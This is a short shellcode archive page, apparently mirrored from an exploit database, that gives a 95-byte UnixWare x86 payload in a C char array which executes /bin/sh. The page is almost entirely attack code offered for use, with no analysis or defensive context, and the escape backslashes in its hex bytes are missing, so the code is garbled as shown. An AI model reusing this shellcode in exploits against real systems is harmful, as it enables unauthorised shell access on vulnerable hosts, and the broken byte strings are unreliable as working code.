[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Unixware execve /bin/sh 95 bytes
# Published : 2004-09-26
# Author : k2
# Previous Title : solaris/x86 add services and execve inetd 201 bytes
# Next Title : windows/XP download and exec source


/*
   UnixWare
   execve() of /bin/sh by K2
*/

char shell[] =
  "xebx48x9axffxffxffxffx07xffxc3x5ex31xc0x89x46xb4"
  "x88x46xb9x88x46x07x89x46x0cx31xc0x50xb0x8dxe8xdf"
  "xffxffxffx83xc4x04x31xc0x50xb0x17xe8xd2xffxffxff"
  "x83xc4x04x31xc0x50x8dx5ex08x53x8dx1ex89x5ex08x53"
  "xb0x3bxe8xbbxffxffxffx83xc4x0cxe8xbbxffxffxffx2f"
  "x62x69x6ex2fx73x68xffxffxffxffxffxffxffxffxff";   


# www.Syue.com [2004-09-26]